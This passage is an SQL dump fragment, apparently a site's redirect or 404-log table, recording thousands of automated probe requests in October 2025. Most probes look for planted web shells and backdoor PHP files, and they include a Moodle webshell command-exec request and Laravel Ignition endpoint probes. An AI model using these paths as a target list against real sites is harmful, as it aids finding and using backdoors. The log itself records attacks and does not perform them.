00:00:00',301),(47969,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/admin.php',NULL,'','',9,0,'2025-10-12 05:21:57','0000-00-00 00:00:00',301),(47970,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/2024/index.php',NULL,'','',1,0,'2025-10-12 05:21:58','0000-00-00 00:00:00',301),(47971,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/admin.php',NULL,'','',1,0,'2025-10-12 05:21:59','0000-00-00 00:00:00',301),(47972,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/admin.php',NULL,'','',2,0,'2025-10-12 05:21:59','0000-00-00 00:00:00',301),(47973,'http://mail.3s-technologies.com.tr/tr/worksec.php',NULL,'','',4,0,'2025-10-12 05:22:00','0000-00-00 00:00:00',301),(47974,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/file.php',NULL,'','',1,0,'2025-10-12 05:22:01','0000-00-00 00:00:00',301),(47975,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/chosen.php',NULL,'','',7,0,'2025-10-12 05:22:02','0000-00-00 00:00:00',301),(47976,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/alfa-rex.php',NULL,'','',1,0,'2025-10-12 05:22:04','0000-00-00 00:00:00',301),(47977,'http://mail.3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/install.php',NULL,'','',1,0,'2025-10-12 05:22:05','0000-00-00 00:00:00',301),(47978,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/about.php',NULL,'','',11,0,'2025-10-12 05:22:06','0000-00-00 00:00:00',301),(47979,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/aahana/json.php',NULL,'','',12,0,'2025-10-12 05:22:07','0000-00-00 00:00:00',301),(47980,'http://mail.3s-technologies.com.tr/tr/wp-configs.php',NULL,'','',23,0,'2025-10-12 05:22:07','0000-00-00 00:00:00',301),(47981,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/about.php',NULL,'','',14,0,'2025-10-12 05:22:08','0000-00-00 00:00:00',301),(47982,'http://mail.3s-technologies.com.tr/tr/update/f35.php',NULL,'','',34,0,'2025-10-12 05:22:09','0000-00-00 00:00:00',301),(47983,'http://mail.3s-technologies.com.tr/tr/wp-content/cong.php',NULL,'','',12,0,'2025-10-12 05:22:12','0000-00-00 00:00:00',301),(47984,'http://mail.3s-technologies.com.tr/tr/item.php',NULL,'','',40,0,'2025-10-12 05:22:13','0000-00-00 00:00:00',301),(47985,'http://mail.3s-technologies.com.tr/tr/jp.php',NULL,'','',44,0,'2025-10-12 05:22:14','0000-00-00 00:00:00',301),(47986,'http://mail.3s-technologies.com.tr/tr/wp-content/packed.php',NULL,'','',17,0,'2025-10-12 05:22:15','0000-00-00 00:00:00',301),(47987,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/chosen.php',NULL,'','',7,0,'2025-10-12 05:22:16','0000-00-00 00:00:00',301),(47988,'http://mail.3s-technologies.com.tr/tr/zews.php',NULL,'','',2,0,'2025-10-12 12:25:00','0000-00-00 00:00:00',301),(47989,'http://mail.3s-technologies.com.tr/tr/ww.php',NULL,'','',16,0,'2025-10-12 12:25:03','0000-00-00 00:00:00',301),(47990,'http://mail.3s-technologies.com.tr/tr/111.php',NULL,'','',20,0,'2025-10-12 12:25:04','0000-00-00 00:00:00',301),(47991,'http://mail.3s-technologies.com.tr/tr/haa.php',NULL,'','',9,0,'2025-10-12 12:25:05','0000-00-00 00:00:00',301),(47992,'http://mail.3s-technologies.com.tr/tr/123.php',NULL,'','',12,0,'2025-10-12 12:25:06','0000-00-00 00:00:00',301),(47993,'http://mail.3s-technologies.com.tr/tr/kk.php',NULL,'','',12,0,'2025-10-12 12:25:20','0000-00-00 00:00:00',301),(47994,'http://mail.3s-technologies.com.tr/tr/cf.php',NULL,'','',1,0,'2025-10-12 12:25:20','0000-00-00 00:00:00',301),(47995,'http://mail.3s-technologies.com.tr/tr/ll.php',NULL,'','',6,0,'2025-10-12 12:25:24','0000-00-00 00:00:00',301),(47996,'http://mail.3s-technologies.com.tr/tr/asus.php',NULL,'','',6,0,'2025-10-12 12:25:27','0000-00-00 00:00:00',301),(47997,'http://mail.3s-technologies.com.tr/tr/flex.php',NULL,'','',6,0,'2025-10-12 12:25:36','0000-00-00 00:00:00',301),(47998,'http://mail.3s-technologies.com.tr/tr/wsd.php',NULL,'','',44,0,'2025-10-12 12:25:39','0000-00-00 00:00:00',301),(47999,'http://mail.3s-technologies.com.tr/tr/fee.php',NULL,'','',1,0,'2025-10-12 12:25:41','0000-00-00 00:00:00',301),(48000,'http://mail.3s-technologies.com.tr/tr/gggssdd.php',NULL,'','',2,0,'2025-10-12 12:25:44','0000-00-00 00:00:00',301),(48001,'http://mail.3s-technologies.com.tr/tr/gool.php',NULL,'','',8,0,'2025-10-12 12:25:47','0000-00-00 00:00:00',301),(48002,'http://mail.3s-technologies.com.tr/tr/nx.php',NULL,'','',4,0,'2025-10-12 15:41:05','0000-00-00 00:00:00',301),(48003,'http://mail.3s-technologies.com.tr/tr/sx21_1.php',NULL,'','',5,0,'2025-10-12 15:41:06','0000-00-00 00:00:00',301),(48004,'http://mail.3s-technologies.com.tr/tr/bluejackets.php',NULL,'','',4,0,'2025-10-12 15:41:06','0000-00-00 00:00:00',301),(48005,'http://mail.3s-technologies.com.tr/tr/pop.php',NULL,'','',22,0,'2025-10-12 15:41:08','0000-00-00 00:00:00',301),(48006,'http://mail.3s-technologies.com.tr/tr/nx9.php',NULL,'','',4,0,'2025-10-12 15:41:08','0000-00-00 00:00:00',301),(48007,'http://mail.3s-technologies.com.tr/tr/kwm4.php',NULL,'','',4,0,'2025-10-12 15:41:09','0000-00-00 00:00:00',301),(48008,'http://mail.3s-technologies.com.tr/tr/ea3f.php',NULL,'','',4,0,'2025-10-12 15:41:09','0000-00-00 00:00:00',301),(48009,'http://mail.3s-technologies.com.tr/tr/akp.php',NULL,'','',4,0,'2025-10-12 15:41:10','0000-00-00 00:00:00',301),(48010,'http://mail.3s-technologies.com.tr/tr/xp.php',NULL,'','',7,0,'2025-10-12 15:41:10','0000-00-00 00:00:00',301),(48011,'http://mail.3s-technologies.com.tr/tr/cwsd.php',NULL,'','',4,0,'2025-10-12 15:41:11','0000-00-00 00:00:00',301),(48012,'http://mail.3s-technologies.com.tr/tr/litanies.php',NULL,'','',4,0,'2025-10-12 15:41:12','0000-00-00 00:00:00',301),(48013,'http://mail.3s-technologies.com.tr/tr/just2.php',NULL,'','',4,0,'2025-10-12 15:41:13','0000-00-00 00:00:00',301),(48014,'http://mail.3s-technologies.com.tr/tr/j.php',NULL,'','',4,0,'2025-10-12 15:41:15','0000-00-00 00:00:00',301),(48015,'http://mail.3s-technologies.com.tr/tr/ex.php',NULL,'','',14,0,'2025-10-12 15:41:16','0000-00-00 00:00:00',301),(48016,'http://mail.3s-technologies.com.tr/tr/s.php',NULL,'','',40,0,'2025-10-12 15:41:17','0000-00-00 00:00:00',301),(48017,'http://mail.3s-technologies.com.tr/tr/let.php',NULL,'','',4,0,'2025-10-12 15:41:18','0000-00-00 00:00:00',301),(48018,'http://mail.3s-technologies.com.tr/tr/amphicyon.php',NULL,'','',4,0,'2025-10-12 15:41:19','0000-00-00 00:00:00',301),(48019,'https://3s-technologies.com.tr/tr/local/moodle_webshell/webshell.php?action=exec&cmd=id',NULL,'','',1,0,'2025-10-12 16:01:44','0000-00-00 00:00:00',301),(48020,'http://3s-technologies.com.tr/tr/local/moodle_webshell/webshell.php?action=exec&cmd=id',NULL,'','',1,0,'2025-10-12 16:01:45','0000-00-00 00:00:00',301),(48021,'http://mail.3s-technologies.com.tr/tr/kao.php',NULL,'','',1,0,'2025-10-12 16:50:56','0000-00-00 00:00:00',301),(48022,'http://mail.3s-technologies.com.tr/tr/cincinnus.php',NULL,'','',1,0,'2025-10-12 16:50:58','0000-00-00 00:00:00',301),(48023,'http://mail.3s-technologies.com.tr/tr/riming.php',NULL,'','',1,0,'2025-10-12 16:50:59','0000-00-00 00:00:00',301),(48024,'http://mail.3s-technologies.com.tr/tr/sphaeristeria.php',NULL,'','',1,0,'2025-10-12 16:51:00','0000-00-00 00:00:00',301),(48025,'http://mail.3s-technologies.com.tr/tr/kaza.php',NULL,'','',9,0,'2025-10-12 16:51:01','0000-00-00 00:00:00',301),(48026,'http://mail.3s-technologies.com.tr/tr/wlex.php',NULL,'','',4,0,'2025-10-12 16:51:06','0000-00-00 00:00:00',301),(48027,'http://mail.3s-technologies.com.tr/tr/tor.php',NULL,'','',8,0,'2025-10-12 16:51:09','0000-00-00 00:00:00',301),(48028,'http://mail.3s-technologies.com.tr/tr/akpc.php',NULL,'','',3,0,'2025-10-12 16:51:46','0000-00-00 00:00:00',301),(48029,'http://mail.3s-technologies.com.tr/tr/haikh.php',NULL,'','',2,0,'2025-10-12 16:52:51','0000-00-00 00:00:00',301),(48030,'http://mail.3s-technologies.com.tr/tr/jmfi.php',NULL,'','',1,0,'2025-10-12 16:52:53','0000-00-00 00:00:00',301),(48031,'http://mail.3s-technologies.com.tr/tr/alf.php',NULL,'','',1,0,'2025-10-12 16:52:59','0000-00-00 00:00:00',301),(48032,'http://mail.3s-technologies.com.tr/tr/update.php',NULL,'','',4,0,'2025-10-12 16:53:01','0000-00-00 00:00:00',301),(48033,'http://www.3s-technologies.com.tr/tr/dcc.php',NULL,'','',1,0,'2025-10-12 22:44:54','0000-00-00 00:00:00',301),(48034,'http://www.3s-technologies.com.tr/tr/plex1.php',NULL,'','',1,0,'2025-10-12 22:44:54','0000-00-00 00:00:00',301),(48035,'http://www.3s-technologies.com.tr/tr/track.php',NULL,'','',1,0,'2025-10-12 22:44:55','0000-00-00 00:00:00',301),(48036,'http://www.3s-technologies.com.tr/tr/woso.php',NULL,'','',1,0,'2025-10-12 22:44:55','0000-00-00 00:00:00',301),(48037,'http://www.3s-technologies.com.tr/tr/himu.php',NULL,'','',5,0,'2025-10-12 22:44:56','0000-00-00 00:00:00',301),(48038,'http://www.3s-technologies.com.tr/tr/doti.php',NULL,'','',2,0,'2025-10-12 22:44:56','0000-00-00 00:00:00',301),(48039,'http://www.3s-technologies.com.tr/tr/en0.php',NULL,'','',1,0,'2025-10-12 22:44:57','0000-00-00 00:00:00',301),(48040,'http://www.3s-technologies.com.tr/tr/kla.php',NULL,'','',1,0,'2025-10-12 22:44:58','0000-00-00 00:00:00',301),(48041,'http://www.3s-technologies.com.tr/tr/aa8.php',NULL,'','',1,0,'2025-10-12 22:44:58','0000-00-00 00:00:00',301),(48042,'http://www.3s-technologies.com.tr/tr/bless3.php',NULL,'','',4,0,'2025-10-12 22:44:58','0000-00-00 00:00:00',301),(48043,'http://www.3s-technologies.com.tr/tr/mariju.php',NULL,'','',1,0,'2025-10-12 22:45:00','0000-00-00 00:00:00',301),(48044,'http://www.3s-technologies.com.tr/tr/ma.php',NULL,'','',3,0,'2025-10-12 22:45:01','0000-00-00 00:00:00',301),(48045,'http://www.3s-technologies.com.tr/tr/0x.php',NULL,'','',19,0,'2025-10-12 22:45:01','0000-00-00 00:00:00',301),(48046,'http://www.3s-technologies.com.tr/tr/wp-file.php',NULL,'','',3,0,'2025-10-12 22:45:02','0000-00-00 00:00:00',301),(48047,'http://www.3s-technologies.com.tr/tr/stealth.php',NULL,'','',1,0,'2025-10-12 22:45:02','0000-00-00 00:00:00',301),(48048,'http://www.3s-technologies.com.tr/tr/str.php',NULL,'','',2,0,'2025-10-12 22:45:03','0000-00-00 00:00:00',301),(48049,'http://www.3s-technologies.com.tr/tr/sid.php',NULL,'','',1,0,'2025-10-12 22:45:03','0000-00-00 00:00:00',301),(48050,'http://www.3s-technologies.com.tr/tr/ggfi.php',NULL,'','',2,0,'2025-10-12 22:45:04','0000-00-00 00:00:00',301),(48051,'http://www.3s-technologies.com.tr/tr/nope.php',NULL,'','',4,0,'2025-10-12 22:45:04','0000-00-00 00:00:00',301),(48052,'http://www.3s-technologies.com.tr/tr/akcc.php',NULL,'','',6,0,'2025-10-12 22:45:06','0000-00-00 00:00:00',301),(48053,'http://www.3s-technologies.com.tr/tr/zews.php',NULL,'','',1,0,'2025-10-12 22:45:07','0000-00-00 00:00:00',301),(48054,'http://www.3s-technologies.com.tr/tr/te.php',NULL,'','',5,0,'2025-10-12 22:45:08','0000-00-00 00:00:00',301),(48055,'http://www.3s-technologies.com.tr/tr/geck.php',NULL,'','',7,0,'2025-10-12 22:45:09','0000-00-00 00:00:00',301),(48056,'http://www.3s-technologies.com.tr/tr/file9.php',NULL,'','',10,0,'2025-10-12 22:45:10','0000-00-00 00:00:00',301),(48057,'http://www.3s-technologies.com.tr/tr/wp-mn.php',NULL,'','',2,0,'2025-10-12 22:45:10','0000-00-00 00:00:00',301),(48058,'http://www.3s-technologies.com.tr/tr/111.php',NULL,'','',6,0,'2025-10-12 22:45:12','0000-00-00 00:00:00',301),(48059,'http://www.3s-technologies.com.tr/tr/haa.php',NULL,'','',3,0,'2025-10-12 22:45:13','0000-00-00 00:00:00',301),(48060,'http://www.3s-technologies.com.tr/tr/123.php',NULL,'','',4,0,'2025-10-12 22:45:14','0000-00-00 00:00:00',301),(48061,'http://www.3s-technologies.com.tr/tr/goat.php',NULL,'','',4,0,'2025-10-12 22:45:15','0000-00-00 00:00:00',301),(48062,'http://www.3s-technologies.com.tr/tr/dev.php',NULL,'','',5,0,'2025-10-12 22:45:18','0000-00-00 00:00:00',301),(48063,'http://www.3s-technologies.com.tr/tr/a1.php',NULL,'','',8,0,'2025-10-12 22:45:19','0000-00-00 00:00:00',301),(48064,'http://www.3s-technologies.com.tr/tr/a2.php',NULL,'','',13,0,'2025-10-12 22:45:20','0000-00-00 00:00:00',301),(48065,'http://www.3s-technologies.com.tr/tr/bless.php',NULL,'','',16,0,'2025-10-12 22:45:21','0000-00-00 00:00:00',301),(48066,'http://www.3s-technologies.com.tr/tr/cf.php',NULL,'','',1,0,'2025-10-12 22:45:28','0000-00-00 00:00:00',301),(48067,'http://www.3s-technologies.com.tr/tr/aa.php',NULL,'','',17,0,'2025-10-12 22:45:28','0000-00-00 00:00:00',301),(48068,'http://www.3s-technologies.com.tr/tr/pepe.php',NULL,'','',1,0,'2025-10-12 22:45:29','0000-00-00 00:00:00',301),(48069,'http://www.3s-technologies.com.tr/tr/ll.php',NULL,'','',3,0,'2025-10-12 22:45:32','0000-00-00 00:00:00',301),(48070,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/maint.php',NULL,'','',5,0,'2025-10-12 22:45:32','0000-00-00 00:00:00',301),(48071,'http://www.3s-technologies.com.tr/tr/atomlib.php',NULL,'','',14,0,'2025-10-12 22:45:33','0000-00-00 00:00:00',301),(48072,'http://www.3s-technologies.com.tr/tr/system_log.php',NULL,'','',9,0,'2025-10-12 22:45:33','0000-00-00 00:00:00',301),(48073,'http://www.3s-technologies.com.tr/tr/asus.php',NULL,'','',2,0,'2025-10-12 22:45:34','0000-00-00 00:00:00',301),(48074,'http://www.3s-technologies.com.tr/tr/wfile.php',NULL,'','',6,0,'2025-10-12 22:45:38','0000-00-00 00:00:00',301),(48075,'http://www.3s-technologies.com.tr/tr/nfile.php',NULL,'','',2,0,'2025-10-12 22:45:38','0000-00-00 00:00:00',301),(48076,'http://www.3s-technologies.com.tr/tr/520.php',NULL,'','',6,0,'2025-10-12 22:45:39','0000-00-00 00:00:00',301),(48077,'http://www.3s-technologies.com.tr/tr/333.php',NULL,'','',10,0,'2025-10-12 22:45:40','0000-00-00 00:00:00',301),(48078,'http://www.3s-technologies.com.tr/tr/bolt.php',NULL,'','',20,0,'2025-10-12 22:45:41','0000-00-00 00:00:00',301),(48079,'http://www.3s-technologies.com.tr/tr/file2.php',NULL,'','',3,0,'2025-10-12 22:45:41','0000-00-00 00:00:00',301),(48080,'http://www.3s-technologies.com.tr/tr/vee.php',NULL,'','',5,0,'2025-10-12 22:45:42','0000-00-00 00:00:00',301),(48081,'http://www.3s-technologies.com.tr/tr/bless5.php',NULL,'','',10,0,'2025-10-12 22:45:43','0000-00-00 00:00:00',301),(48082,'http://www.3s-technologies.com.tr/tr/hook.php',NULL,'','',6,0,'2025-10-12 22:45:43','0000-00-00 00:00:00',301),(48083,'http://www.3s-technologies.com.tr/tr/flex.php',NULL,'','',2,0,'2025-10-12 22:45:44','0000-00-00 00:00:00',301),(48084,'http://www.3s-technologies.com.tr/tr/ut.php',NULL,'','',2,0,'2025-10-12 22:45:45','0000-00-00 00:00:00',301),(48085,'http://www.3s-technologies.com.tr/tr/usep.php',NULL,'','',4,0,'2025-10-12 22:45:45','0000-00-00 00:00:00',301),(48086,'http://www.3s-technologies.com.tr/tr/f6.php',NULL,'','',11,0,'2025-10-12 22:45:46','0000-00-00 00:00:00',301),(48087,'http://www.3s-technologies.com.tr/tr/wsd.php',NULL,'','',14,0,'2025-10-12 22:45:47','0000-00-00 00:00:00',301),(48088,'http://www.3s-technologies.com.tr/tr/inde.php',NULL,'','',6,0,'2025-10-12 22:45:47','0000-00-00 00:00:00',301),(48089,'http://www.3s-technologies.com.tr/tr/gifclass.php',NULL,'','',18,0,'2025-10-12 22:45:48','0000-00-00 00:00:00',301),(48090,'http://www.3s-technologies.com.tr/tr/fee.php',NULL,'','',1,0,'2025-10-12 22:45:49','0000-00-00 00:00:00',301),(48091,'http://www.3s-technologies.com.tr/tr/jmfi2.php',NULL,'','',6,0,'2025-10-12 22:45:50','0000-00-00 00:00:00',301),(48092,'http://www.3s-technologies.com.tr/tr/gggssdd.php',NULL,'','',1,0,'2025-10-12 22:45:51','0000-00-00 00:00:00',301),(48093,'http://www.3s-technologies.com.tr/tr/file7.php',NULL,'','',6,0,'2025-10-12 22:45:52','0000-00-00 00:00:00',301),(48094,'http://www.3s-technologies.com.tr/tr/ilex.php',NULL,'','',3,0,'2025-10-12 22:45:53','0000-00-00 00:00:00',301),(48095,'http://www.3s-technologies.com.tr/tr/fffff.php',NULL,'','',2,0,'2025-10-12 22:45:54','0000-00-00 00:00:00',301),(48096,'http://www.3s-technologies.com.tr/tr/gool.php',NULL,'','',2,0,'2025-10-12 22:45:54','0000-00-00 00:00:00',301),(48097,'https://3s-technologies.com.tr/tr/assets/blt2a9d21fb69875fd4/blt53d566bc2d5b4519/67c36395c1fe960584550246/landing.svg',NULL,'https://3s-technologies.com.tr/assets/blt2a9d21fb69875fd4/blt53d566bc2d5b4519/67c36395c1fe960584550246/landing.svg','',2,0,'2025-10-13 09:07:22','0000-00-00 00:00:00',301),(48098,'http://3s-technologies.com.tr/tr/info.php/aa.php',NULL,'','',2,0,'2025-10-13 23:09:10','0000-00-00 00:00:00',301),(48099,'http://3s-technologies.com.tr/tr/about/function.php/aa.php',NULL,'','',2,0,'2025-10-13 23:09:12','0000-00-00 00:00:00',301),(48100,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/ab0ut.php/aa.php',NULL,'','',1,0,'2025-10-13 23:09:13','0000-00-00 00:00:00',301),(48101,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/file.php/aa.php',NULL,'','',1,0,'2025-10-13 23:09:13','0000-00-00 00:00:00',301),(48102,'http://3s-technologies.com.tr/tr/test1.php/aa.php',NULL,'','',2,0,'2025-10-13 23:09:15','0000-00-00 00:00:00',301),(48103,'http://3s-technologies.com.tr/tr/img/post.php',NULL,'','',2,0,'2025-10-13 23:09:21','0000-00-00 00:00:00',301),(48104,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comments',NULL,'','',4,0,'2025-10-13 23:09:27','0000-00-00 00:00:00',301),(48105,'http://3s-technologies.com.tr/tr/wp-content/themes/chosen.php',NULL,'','',9,0,'2025-10-13 23:09:36','0000-00-00 00:00:00',301),(48106,'http://3s-technologies.com.tr/tr/2021/01/16/upload-and-download-file-using-multipart-form-over-',NULL,'','',2,0,'2025-10-13 23:09:41','0000-00-00 00:00:00',301),(48107,'http://3s-technologies.com.tr/tr/alfa_data/admin.php',NULL,'','',1,0,'2025-10-15 10:08:05','0000-00-00 00:00:00',301),(48108,'http://3s-technologies.com.tr/tr/images/images/about.php',NULL,'','',13,0,'2025-10-15 10:08:22','0000-00-00 00:00:00',301),(48109,'https://www.3s-technologies.com.tr/tr/prismic/thee-eclipse/zkudziol0zci9lli_svgwebpageato.svg',NULL,'https://www.3s-technologies.com.tr/prismic/thee-eclipse/ZkUdziol0Zci9LlI_SVGWEBPAGEATO.svg','',2,0,'2025-10-15 17:33:52','0000-00-00 00:00:00',301),(48110,'http://3s-technologies.com.tr/tr/kao.php',NULL,'','',3,0,'2025-10-15 18:03:11','0000-00-00 00:00:00',301),(48111,'http://3s-technologies.com.tr/tr/kaza.php',NULL,'','',22,0,'2025-10-15 18:03:12','0000-00-00 00:00:00',301),(48112,'http://3s-technologies.com.tr/tr/flex.php',NULL,'','',10,0,'2025-10-15 18:03:14','0000-00-00 00:00:00',301),(48113,'http://3s-technologies.com.tr/tr/wlex.php',NULL,'','',3,0,'2025-10-15 18:03:15','0000-00-00 00:00:00',301),(48114,'http://3s-technologies.com.tr/tr/thxt.php',NULL,'','',10,0,'2025-10-15 18:03:42','0000-00-00 00:00:00',301),(48115,'http://3s-technologies.com.tr/tr/haikh.php',NULL,'','',4,0,'2025-10-15 18:04:07','0000-00-00 00:00:00',301),(48116,'http://3s-technologies.com.tr/tr/wsd.php',NULL,'','',85,0,'2025-10-15 18:04:15','0000-00-00 00:00:00',301),(48117,'http://3s-technologies.com.tr/tr/woso.php',NULL,'','',1,0,'2025-10-15 18:04:15','0000-00-00 00:00:00',301),(48118,'http://3s-technologies.com.tr/tr/doti.php',NULL,'','',10,0,'2025-10-15 18:04:16','0000-00-00 00:00:00',301),(48119,'http://3s-technologies.com.tr/tr/en0.php',NULL,'','',4,0,'2025-10-15 18:04:16','0000-00-00 00:00:00',301),(48120,'http://3s-technologies.com.tr/tr/ma.php',NULL,'','',22,0,'2025-10-15 18:04:19','0000-00-00 00:00:00',301),(48121,'http://3s-technologies.com.tr/tr/sid.php',NULL,'','',4,0,'2025-10-15 18:04:20','0000-00-00 00:00:00',301),(48122,'http://3s-technologies.com.tr/tr/nc5.php',NULL,'','',1,0,'2025-10-15 18:04:22','0000-00-00 00:00:00',301),(48123,'http://3s-technologies.com.tr/tr/zona.php',NULL,'','',1,0,'2025-10-15 18:04:23','0000-00-00 00:00:00',301),(48124,'http://3s-technologies.com.tr/tr/aa33.php',NULL,'','',1,0,'2025-10-15 18:04:24','0000-00-00 00:00:00',301),(48125,'http://3s-technologies.com.tr/tr/ddd.php',NULL,'','',17,0,'2025-10-15 18:04:25','0000-00-00 00:00:00',301),(48126,'http://3s-technologies.com.tr/tr/eau.php',NULL,'','',1,0,'2025-10-15 18:04:25','0000-00-00 00:00:00',301),(48127,'http://3s-technologies.com.tr/tr/hlex.php',NULL,'','',1,0,'2025-10-15 18:04:28','0000-00-00 00:00:00',301),(48128,'http://3s-technologies.com.tr/tr/about9.php',NULL,'','',1,0,'2025-10-15 18:04:28','0000-00-00 00:00:00',301),(48129,'http://3s-technologies.com.tr/tr/lites.php',NULL,'','',18,0,'2025-10-15 18:04:29','0000-00-00 00:00:00',301),(48130,'http://3s-technologies.com.tr/tr/lls3.php',NULL,'','',1,0,'2025-10-15 18:04:32','0000-00-00 00:00:00',301),(48131,'http://3s-technologies.com.tr/tr/ger.php',NULL,'','',1,0,'2025-10-15 18:04:34','0000-00-00 00:00:00',301),(48132,'http://3s-technologies.com.tr/tr/ryo.php',NULL,'','',1,0,'2025-10-15 18:04:35','0000-00-00 00:00:00',301),(48133,'http://3s-technologies.com.tr/tr/enclas.php',NULL,'','',21,0,'2025-10-15 18:04:36','0000-00-00 00:00:00',301),(48134,'http://3s-technologies.com.tr/tr/final.php',NULL,'','',1,0,'2025-10-15 18:04:36','0000-00-00 00:00:00',301),(48135,'http://3s-technologies.com.tr/tr/filer.php',NULL,'','',11,0,'2025-10-15 18:04:37','0000-00-00 00:00:00',301),(48136,'http://3s-technologies.com.tr/tr/wpo.php',NULL,'','',17,0,'2025-10-15 18:04:38','0000-00-00 00:00:00',301),(48137,'http://3s-technologies.com.tr/tr/opts.php',NULL,'','',23,0,'2025-10-15 18:04:40','0000-00-00 00:00:00',301),(48138,'http://3s-technologies.com.tr/tr/media/com_acym/js/modal.min.js',NULL,'','',6,0,'2025-10-15 18:14:38','0000-00-00 00:00:00',301),(48139,'http://3s-technologies.com.tr/tr/public/moon.php',NULL,'','',2,0,'2025-10-15 22:46:29','0000-00-00 00:00:00',301),(48140,'https://mail.3s-technologies.com.tr/_ignition/execute-solution',NULL,'','',1,0,'2025-10-16 01:32:19','0000-00-00 00:00:00',301),(48141,'https://www.3s-technologies.com.tr/_ignition/execute-solution',NULL,'','',1,0,'2025-10-16 01:32:20','0000-00-00 00:00:00',301),(48142,'https://3s-technologies.com.tr/tr/inner-strategy-342420.appspot.com/landing.svg',NULL,'https://3s-technologies.com.tr/inner-strategy-342420.appspot.com/landing.svg','',1,0,'2025-10-16 04:48:22','0000-00-00 00:00:00',301),(48143,'http://www.3s-technologies.com.tr/tr/mlex.php',NULL,'','',2,0,'2025-10-16 16:54:17','0000-00-00 00:00:00',301),(48144,'http://www.3s-technologies.com.tr/tr/wlex.php',NULL,'','',1,0,'2025-10-16 16:54:18','0000-00-00 00:00:00',301),(48145,'http://www.3s-technologies.com.tr/tr/wp-aaa.php',NULL,'','',1,0,'2025-10-16 16:54:19','0000-00-00 00:00:00',301),(48146,'http://www.3s-technologies.com.tr/tr/vast.php',NULL,'','',1,0,'2025-10-16 16:54:20','0000-00-00 00:00:00',301),(48147,'http://www.3s-technologies.com.tr/tr/tor.php',NULL,'','',2,0,'2025-10-16 16:54:21','0000-00-00 00:00:00',301),(48148,'http://www.3s-technologies.com.tr/tr/klex.php',NULL,'','',2,0,'2025-10-16 16:54:22','0000-00-00 00:00:00',301),(48149,'http://www.3s-technologies.com.tr/tr/sec.php',NULL,'','',1,0,'2025-10-16 16:54:23','0000-00-00 00:00:00',301),(48150,'http://www.3s-technologies.com.tr/tr/about3.php',NULL,'','',4,0,'2025-10-16 16:54:24','0000-00-00 00:00:00',301),(48151,'http://www.3s-technologies.com.tr/tr/file88.php',NULL,'','',2,0,'2025-10-16 16:54:29','0000-00-00 00:00:00',301),(48152,'http://www.3s-technologies.com.tr/tr/gifclass4.php',NULL,'','',8,0,'2025-10-16 16:54:30','0000-00-00 00:00:00',301),(48153,'http://www.3s-technologies.com.tr/tr/class-wp.php',NULL,'','',3,0,'2025-10-16 16:54:30','0000-00-00 00:00:00',301),(48154,'http://www.3s-technologies.com.tr/tr/wpls.php',NULL,'','',3,0,'2025-10-16 16:54:31','0000-00-00 00:00:00',301),(48155,'http://www.3s-technologies.com.tr/tr/gelap.php',NULL,'','',3,0,'2025-10-16 16:54:34','0000-00-00 00:00:00',301),(48156,'http://www.3s-technologies.com.tr/tr/class19.php',NULL,'','',12,0,'2025-10-16 16:54:35','0000-00-00 00:00:00',301),(48157,'http://www.3s-technologies.com.tr/tr/racs3.php',NULL,'','',2,0,'2025-10-16 16:54:36','0000-00-00 00:00:00',301),(48158,'http://www.3s-technologies.com.tr/tr/blex.php',NULL,'','',1,0,'2025-10-16 16:54:39','0000-00-00 00:00:00',301),(48159,'http://www.3s-technologies.com.tr/tr/ssss.php',NULL,'','',2,0,'2025-10-16 16:54:40','0000-00-00 00:00:00',301),(48160,'http://www.3s-technologies.com.tr/tr/file15.php',NULL,'','',4,0,'2025-10-16 16:54:41','0000-00-00 00:00:00',301),(48161,'http://www.3s-technologies.com.tr/tr/hk.php',NULL,'','',3,0,'2025-10-16 16:54:42','0000-00-00 00:00:00',301),(48162,'http://www.3s-technologies.com.tr/tr/aa21.php',NULL,'','',1,0,'2025-10-16 16:54:43','0000-00-00 00:00:00',301),(48163,'http://www.3s-technologies.com.tr/tr/alpa.php',NULL,'','',2,0,'2025-10-16 16:54:44','0000-00-00 00:00:00',301),(48164,'http://www.3s-technologies.com.tr/tr/classgoto24.php',NULL,'','',1,0,'2025-10-16 16:54:48','0000-00-00 00:00:00',301),(48165,'http://www.3s-technologies.com.tr/tr/ckk.php',NULL,'','',3,0,'2025-10-16 16:54:50','0000-00-00 00:00:00',301),(48166,'http://www.3s-technologies.com.tr/tr/ioxi-o2.php',NULL,'','',4,0,'2025-10-16 16:54:53','0000-00-00 00:00:00',301),(48167,'http://www.3s-technologies.com.tr/tr/thh.php',NULL,'','',1,0,'2025-10-16 16:54:55','0000-00-00 00:00:00',301),(48168,'http://www.3s-technologies.com.tr/tr/akpc.php',NULL,'','',1,0,'2025-10-16 16:54:57','0000-00-00 00:00:00',301),(48169,'http://www.3s-technologies.com.tr/tr/dove.php',NULL,'','',1,0,'2025-10-16 16:55:01','0000-00-00 00:00:00',301),(48170,'http://www.3s-technologies.com.tr/tr/fileas.php',NULL,'','',4,0,'2025-10-16 16:55:03','0000-00-00 00:00:00',301),(48171,'http://www.3s-technologies.com.tr/tr/yellow.php',NULL,'','',2,0,'2025-10-16 16:55:03','0000-00-00 00:00:00',301),(48172,'http://www.3s-technologies.com.tr/tr/plss3.php',NULL,'','',6,0,'2025-10-16 16:55:06','0000-00-00 00:00:00',301),(48173,'http://www.3s-technologies.com.tr/tr/ton.php',NULL,'','',12,0,'2025-10-16 16:55:07','0000-00-00 00:00:00',301),(48174,'http://www.3s-technologies.com.tr/tr/he.php',NULL,'','',2,0,'2025-10-16 16:55:08','0000-00-00 00:00:00',301),(48175,'http://www.3s-technologies.com.tr/tr/thxt.php',NULL,'','',1,0,'2025-10-16 16:55:09','0000-00-00 00:00:00',301),(48176,'http://www.3s-technologies.com.tr/tr/gel4y.php',NULL,'','',1,0,'2025-10-16 